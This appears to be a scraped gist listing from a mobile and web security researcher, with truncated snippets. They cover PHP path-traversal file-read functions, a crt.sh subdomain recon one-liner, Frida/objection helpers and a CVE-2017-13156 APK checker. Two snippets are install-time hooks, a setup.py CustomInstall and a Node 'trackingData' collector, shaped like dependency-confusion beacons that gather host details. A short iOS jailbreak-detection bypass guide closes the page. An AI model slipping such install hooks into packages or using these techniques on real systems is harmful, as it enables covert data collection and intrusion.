-
Path traversal ( these functions can be used to read files )
- functions
- readfile()
- file_get_contents()
- fopen()
- fread()
- fgets()
- functions
-
Server Side Request Forgery ( SSRF )
- Recon crt.sh
- curl -s https://crt.sh\?O=\%.google.com\&output\=json | jq -r '.[].name_value' | sed 's/*.//g' | sort -u
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
from sys import exit | |
import os | |
import time | |
""" | |
Using objection and dumping all activities with | |
android hooking list activities |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
me=`basename "$0"` | |
echo ":: verify CVE-2017-13156 ::" | |
echo ":: USAGE bash $me <filename_.apk> " | |
command -v apksigner >/dev/null 2>&1 || { echo >&2 "apksigner not in \$PATH. Aborting."; exit 1; } | |
command -v apktool >/dev/null 2>&1 || { echo >&2 "apktool not in \$PATH. Aborting."; exit 1; } | |
file=$1 | |
echo "verifing signatures" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* | |
* Author: __rodx00__ | |
* | |
* Usefull functions while reversing frida scripts. | |
*/ | |
function bin2ascii(array) { | |
var result = []; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from setuptools import setup | |
from setuptools.command.install import install | |
import requests | |
import socket | |
import getpass | |
import os | |
class CustomInstall(install): | |
def run(self): | |
install.run(self) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const os = require("os"); | |
const dns = require("dns"); | |
const querystring = require("querystring"); | |
const https = require("https"); | |
const packageJSON = require("./package.json"); | |
const package = packageJSON.name; | |
const trackingData = JSON.stringify({ | |
p: package, | |
c: __dirname, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* Rodolfo 'rodx00' Tavares | |
* twitter @0xrodnt | |
* github rodnt | |
*/ | |
if(ObjC.available) { | |
const tamperLibs = [ | |
"Substrate", |
This is not a tutorial, just a small guide to myself but feel free to get some infos here.
Working on an iPhone 7 running iOS 14.5.1
-
Jailbreak an iPhone/iPad/whatever
-
If necessary, you'll need to bypass Jailbreak detection for some apps with tweaks like
A-Bypass
,Hestia
,HideJB
, etc. -
Get the PID of the app you want to capture traffic from with
frida-ps -Ua
(a
is for showing running apps only, you can-U
to show all running processes instead)
NewerOlder